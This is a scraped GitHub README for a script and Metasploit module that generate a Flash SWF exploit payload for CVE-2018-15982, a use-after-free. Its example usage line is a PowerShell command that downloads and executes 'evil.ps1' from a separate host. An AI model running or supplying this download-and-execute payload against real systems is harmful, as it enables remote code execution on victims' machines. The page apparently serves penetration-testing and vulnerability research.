Skip to content

kphongagsorn/adobe-flash-cve2018-15982

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

49 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Adobe Flash CVE-2018-15982

This script creates a swf payload for CVE-2018-15982, which is based off of the PoC from https://github.com/smgorelik/Windows-RCE-exploits. The vulnerability was discovered by Chenming Xu and Ed Miles of Gigamon ATR.

The vulnerability is a use-after-free flaw enabling arbitrary code-execution in Flash. More information can be found in the links below.

Note: Currently only spraying one block, I noticed this after I created the script.

Usage:

python create_swf.py <command> <output file name>

Example Usage:

python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf

Tested on:

  • Windows 10 Enterprise 10.0.17134, Internet Explorer 11.285.17134.0
  • Adobe Flash 31.0.0.153, 29.0.0.140

Example

Create payload:

alt text

Executing payload:

alt text

Confirm execution:

alt text

Metasploit Module

alt text

About

Script and metasploit module for CVE-2018-15982

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published